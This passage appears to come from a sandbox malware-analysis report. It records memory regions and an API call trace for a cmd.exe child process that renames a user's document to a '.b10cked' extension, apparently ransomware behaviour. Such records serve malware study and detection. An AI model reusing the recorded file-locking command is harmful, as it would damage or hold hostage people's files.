= 0x6efc0000 end_va = 0x6efdcfff entry_point = 0x6efc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34932 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34933 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34934 start_va = 
0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34935 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34936 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34937 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34938 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34939 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34940 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34941 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34942 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34943 start_va = 0x3b0000 end_va = 
0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 34944 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34945 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 864 os_tid = 0xe0 Process: id = "625" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34958 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34959 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34960 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34961 start_va = 
0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34962 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34963 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34964 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34965 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34966 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34967 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35402 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35403 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35404 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35405 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 35406 start_va = 0x330000 end_va = 0x42ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 35407 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35408 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35409 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35410 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35411 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35412 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35413 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35414 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35415 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35416 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 35417 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35418 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35419 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35420 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35421 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 35422 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 35423 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 35424 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 35425 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 865 os_tid = 0xe8 [0235.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fe3c | out: lpSystemTimeAsFileTime=0x16fe3c*(dwLowDateTime=0xbf8d2500, dwHighDateTime=0x1d440a9)) [0235.024] GetCurrentProcessId () returned 
0xe4 [0235.024] GetCurrentThreadId () returned 0xe8 [0235.024] GetTickCount () returned 0x40897 [0235.024] QueryPerformanceCounter (in: lpPerformanceCount=0x16fe34 | out: lpPerformanceCount=0x16fe34*=29181283160) returned 1 [0235.024] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.024] __set_app_type (_Type=0x1) [0235.024] __p__fmode () returned 0x76b331f4 [0235.024] __p__commode () returned 0x76b331fc [0235.024] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.025] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.025] GetCurrentThreadId () returned 0xe8 [0235.025] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe8) returned 0x38 [0235.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.025] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.025] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.025] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.025] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fdcc | out: phkResult=0x16fdcc*=0x0) returned 0x2 [0235.025] VirtualQuery (in: lpAddress=0x16fe03, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd9c, 
dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.025] GetConsoleOutputCP () returned 0x1b5 [0235.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.026] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.026] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.026] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.026] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.026] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.026] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.026] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.026] GetEnvironmentStringsW () returned 0x3401f8* [0235.027] FreeEnvironmentStringsW (penv=0x3401f8) returned 1 [0235.027] GetEnvironmentStringsW () returned 0x3401f8* [0235.027] FreeEnvironmentStringsW (penv=0x3401f8) returned 1 [0235.027] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, 
phkResult=0x16ed3c | out: phkResult=0x16ed3c*=0x40) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x88, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x0, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegCloseKey (hKey=0x40) returned 0x0 [0235.027] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ed3c | out: phkResult=0x16ed3c*=0x40) returned 0x0 
[0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x0, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x9, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x9, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x9, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegCloseKey (hKey=0x40) returned 0x0 [0235.027] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.028] srand (_Seed=0x5b8863c2) [0235.028] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"" [0235.028] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"" [0235.028] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.028] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341958, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.028] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.028] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.028] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.028] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.028] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.028] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.028] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.028] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.029] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.029] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.029] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.029] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.029] GetEnvironmentStringsW () returned 0x342348* [0235.029] FreeEnvironmentStringsW (penv=0x342348) returned 1 [0235.029] 
GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.029] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.029] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.029] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.029] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.029] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.029] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.029] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.029] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.029] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.029] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fb08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.029] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fb08, lpFilePart=0x16fb04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fb04*="Desktop") returned 0x18 [0235.029] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.029] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f884 | out: lpFindFileData=0x16f884) returned 0x3409d8 [0235.029] FindClose (in: hFindFile=0x3409d8 | out: hFindFile=0x3409d8) returned 1 [0235.030] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f884 | out: lpFindFileData=0x16f884) returned 0x3409d8 [0235.030] FindClose (in: hFindFile=0x3409d8 | out: hFindFile=0x3409d8) returned 1 [0235.030] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f884 | out: lpFindFileData=0x16f884) returned 0x3409d8 [0235.030] FindClose (in: hFindFile=0x3409d8 | out: hFindFile=0x3409d8) returned 1 
[0235.030] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.030] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.030] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.030] GetEnvironmentStringsW () returned 0x3401f8* [0235.030] FreeEnvironmentStringsW (penv=0x3401f8) returned 1 [0235.030] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.031] GetConsoleOutputCP () returned 0x1b5 [0235.031] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.031] GetUserDefaultLCID () returned 0x409 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fc48, cchData=128 | out: lpLCData="0") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fc48, cchData=128 | out: lpLCData="0") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fc48, cchData=128 | out: lpLCData="1") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, 
cchData=32 | out: lpLCData="Fri") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.032] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.032] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.032] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.032] GetConsoleTitleW (in: lpConsoleTitle=0x330920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.032] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.033] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.033] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.033] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.033] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.033] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.033] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.033] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.033] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.033] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.033] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.037] GetConsoleTitleW (in: lpConsoleTitle=0x16f940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.037] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.037] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.037] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.037] _wcsicmp (_String1="move", _String2="TYPE") returned -7 
